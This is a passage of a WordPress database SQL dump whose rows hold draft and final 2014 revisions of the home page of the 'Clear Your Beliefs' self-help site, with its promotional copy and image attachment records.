in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-04 18:16:40', '2014-11-04 23:16:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1451, 2, '2014-10-06 23:16:47', '2014-10-07 04:16:47', '', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-06 23:16:47', '2014-10-07 04:16:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1457, 2, '2014-10-07 00:36:46', '2014-10-07 05:36:46', '', 'header', '', 'inherit', 'closed', 'open', '', 'header', '', '', '2014-10-07 00:36:46', '2014-10-07 05:36:46', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg', 0, 'attachment', 'image/jpeg', 0),
(1456, 2, '2014-10-07 00:35:25', '2014-10-07 05:35:25', 'Test\nTest\nTest\nVideo Goes Here\nContent goes here', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 00:35:25', '2014-10-07 05:35:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1458, 2, '2014-10-07 00:37:14', '2014-10-07 05:37:14', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>			Test\nTest\nTest\nVideo Goes Here\nContent goes here', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 00:37:14', '2014-10-07 05:37:14', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1577, 2, '2014-10-22 19:15:36', '2014-10-23 00:15:36', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="margin-left: 255px;margin-bottom: 0px"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px" target="_self"> Button text</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-22 19:15:36', '2014-10-23 00:15:36', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1460, 2, '2014-10-07 00:57:50', '2014-10-07 05:57:50', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nTest\nTest\nTest\nContent goes here', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 00:57:50', '2014-10-07 05:57:50', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1463, 2, '2014-10-07 01:44:15', '2014-10-07 06:44:15', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\nContent goes here', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 01:44:15', '2014-10-07 06:44:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1462, 2, '2014-10-07 01:42:27', '2014-10-07 06:42:27', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nThis is box titleBox content\nThis is box titleBox content\nThis is box titleBox content\nContent goes here', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 01:42:27', '2014-10-07 06:42:27', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1464, 2, '2014-10-07 01:53:33', '2014-10-07 06:53:33', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calm<p>Rediscover the source of your personal power</p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calm<p>Rediscover the source of your personal power</p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 01:53:33', '2014-10-07 06:53:33', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1465, 2, '2014-10-07 01:54:12', '2014-10-07 06:54:12', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calm<p>Rediscover the source of your personal power</p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calm<p>Rediscover the source of your personal power</p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 01:54:12', '2014-10-07 06:54:12', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1466, 2, '2014-10-07 01:56:16', '2014-10-07 06:56:16', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 01:56:16', '2014-10-07 06:56:16', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1467, 2, '2014-10-07 02:26:40', '2014-10-07 07:26:40', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p>&lt;div&gt;</p><p><strong>I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies. </p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.” </p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun? </p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey. </p><p>Warmly,</p><p>&lt;/div&gt;</p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 02:26:40', '2014-10-07 07:26:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1468, 2, '2014-10-07 02:41:03', '2014-10-07 07:41:03', '', 'lion', '', 'inherit', 'closed', 'open', '', 'lion-3', '', '', '2014-10-07 02:41:03', '2014-10-07 07:41:03', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg', 0, 'attachment', 'image/jpeg', 0),
(1470, 2, '2014-10-07 02:52:40', '2014-10-07 07:52:40', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="alignleft size-full wp-image-1468" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 02:52:40', '2014-10-07 07:52:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1469, 2, '2014-10-07 02:41:46', '2014-10-07 07:41:46', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p>&lt;div&gt;</p><p><strong>I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies. </p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.” </p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun? </p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey. </p><p>Warmly,</p><p><img class="alignleft size-full wp-image-1468" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p> </p><p> </p><p> </p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong> </p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward. </p><p><strong>Click HERE to Learn More</strong></p><p>&lt;/div&gt;</p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 02:41:46', '2014-10-07 07:41:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1471, 2, '2014-10-07 19:56:42', '2014-10-08 00:56:42', '', 'pic', '', 'inherit', 'closed', 'open', '', 'pic', '', '', '2014-10-07 19:56:42', '2014-10-08 00:56:42', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png', 0, 'attachment', 'image/png', 0),
(1472, 2, '2014-10-07 19:57:22', '2014-10-08 00:57:22', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 19:57:22', '2014-10-08 00:57:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1473, 2, '2014-10-07 20:00:43', '2014-10-08 01:00:43', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1Box content\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 20:00:43', '2014-10-08 01:00:43', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1474, 2, '2014-10-07 20:13:22', '2014-10-08 01:13:22', '', 'ebook', '', 'inherit', 'closed', 'open', '', 'ebook', '', '', '2014-10-07 20:13:22', '2014-10-08 01:13:22', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook.png', 0, 'attachment', 'image/png', 0),
(1475, 2, '2014-10-07 20:14:47', '2014-10-08 01:14:47', '', 'Clear your beliefs ebook', '', 'inherit', 'closed', 'open', '', 'ebook-2', '', '', '2014-10-07 20:14:47', '2014-10-08 01:14:47', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png', 0, 'attachment', 'image/png', 0),
(1476, 2, '2014-10-07 20:16:08', '2014-10-08 01:16:08', '', 'clear your beliefs ebook', '', 'inherit', 'closed', 'open', '', 'ebook-3', '', '', '2014-10-07 20:16:08', '2014-10-08 01:16:08', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
